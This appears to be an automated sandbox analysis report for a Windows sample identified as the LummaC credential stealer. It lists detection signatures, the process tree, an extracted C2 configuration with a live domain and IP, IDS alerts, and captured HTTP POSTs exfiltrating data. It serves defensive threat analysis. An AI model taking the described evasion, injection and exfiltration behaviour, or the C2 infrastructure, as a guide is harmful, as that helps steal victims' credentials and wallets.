Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1561487
MD5:	e7aa83909ace3906ec75144cc33e024c
SHA1:	333ee9d7f4c683d8e0ed05bdadfbd2baade379e3
SHA256:	24443cd457177eeed9c584e5d5ad194303fd94269fdb0d72e0db598215a5c826
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Query firmware table information (likely to detect VMs)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found inlined nop instructions (likely shell or obfuscated code)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E7AA83909ACE3906EC75144CC33E024C)

conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 2196 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

WerFault.exe (PID: 2836 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1224 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "https://disobey-curly.sbs/api", "Build Version": "H8NgCl--lonikir"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1799079639.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7132	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 2196	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 2196	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T14:59:50.863041+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	172.67.223.140	443	TCP
2024-11-23T14:59:53.122240+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	172.67.223.140	443	TCP
2024-11-23T14:59:55.416705+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	172.67.223.140	443	TCP
2024-11-23T14:59:57.908705+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	172.67.223.140	443	TCP
2024-11-23T15:00:00.236881+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	172.67.223.140	443	TCP
2024-11-23T15:00:02.720212+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	172.67.223.140	443	TCP
2024-11-23T15:00:05.070021+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	172.67.223.140	443	TCP
2024-11-23T15:00:09.634403+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	172.67.223.140	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T14:59:51.810637+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	172.67.223.140	443	TCP
2024-11-23T14:59:53.825426+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	172.67.223.140	443	TCP
2024-11-23T15:00:10.352806+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49744	172.67.223.140	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T14:59:51.810637+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	172.67.223.140	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T14:59:53.825426+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49732	172.67.223.140	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T14:59:58.742675+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49737	172.67.223.140	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: aspnet_regiis.exe.2196.2.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": "https://disobey-curly.sbs/api", "Build Version": "H8NgCl--lonikir"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\gdi32.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49744 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: %%.pdb source: file.exe, 00000000.00000002.2350885780.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, WER4C58.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\file.PDB source: file.exe, 00000000.00000002.2350885780.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\file.PDB source: file.exe, 00000000.00000002.2350943635.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER4C58.tmp.dmp.5.dr
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: file.exe, 00000000.00000002.2350885780.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER4C58.tmp.dmp.5.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [edi]	0_2_0061D8D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then push eax	0_2_006332A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_006182B0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, eax	0_2_00633320
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_00633320
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h	0_2_00633720

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.223.140:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.223.140:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 172.67.223.140:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.223.140:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49737 -> 172.67.223.140:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 172.67.223.140:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://disobey-curly.sbs/api

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.223.140:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.223.140:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.223.140:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.223.140:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.223.140:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.223.140:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.223.140:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.223.140:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: disobey-curly.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: disobey-curly.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PN69PVY0VSG3MGCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18147Host: disobey-curly.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=R8OZ1M0FCCDE4CGU3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8780Host: disobey-curly.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4W6Y6DDOCXYZ0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20409Host: disobey-curly.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XUYYFZQQQCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1225Host: disobey-curly.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H7HA15TN2DGIA4Z42User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568214Host: disobey-curly.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: disobey-curly.sbs

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: disobey-curly.sbs

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: disobey-curly.sbs

Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: aspnet_regiis.exe, 00000002.00000003.1796754164.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: aspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: aspnet_regiis.exe, 00000002.00000003.1749787283.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1797517806.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://disobey-curly.sbs/
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000003.1819973696.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1823663645.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1889237292.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1888898483.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2003490990.0000000002C25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725528759.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1836515078.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2003490990.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2003656590.0000000002C92000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1888898483.0000000002C25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1749787283.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://disobey-curly.sbs/api
Source: aspnet_regiis.exe, 00000002.00000002.2003656590.0000000002C92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://disobey-curly.sbs/api.
Source: aspnet_regiis.exe, 00000002.00000003.1749787283.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://disobey-curly.sbs/apiI
Source: aspnet_regiis.exe, 00000002.00000003.1836515078.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://disobey-curly.sbs/apiu
Source: aspnet_regiis.exe, 00000002.00000003.1819973696.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1823663645.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://disobey-curly.sbs/u
Source: aspnet_regiis.exe, 00000002.00000003.1749787283.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://disobey-curly.sbs/z
Source: aspnet_regiis.exe, 00000002.00000002.2003619928.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1820026079.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://disobey-curly.sbs:443/api
Source: aspnet_regiis.exe, 00000002.00000003.1889111505.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1888898483.0000000002C63000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1889212884.0000000002C79000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2003619928.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://disobey-curly.sbs:443/apiO
Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: aspnet_regiis.exe, 00000002.00000003.1726503626.0000000005005000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: aspnet_regiis.exe, 00000002.00000003.1726582628.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1750336942.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1749313377.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726686158.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726503626.0000000005003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: aspnet_regiis.exe, 00000002.00000003.1726582628.0000000004F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: aspnet_regiis.exe, 00000002.00000003.1726582628.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1750336942.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1749313377.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726686158.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726503626.0000000005003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: aspnet_regiis.exe, 00000002.00000003.1726582628.0000000004F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: aspnet_regiis.exe, 00000002.00000003.1796754164.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
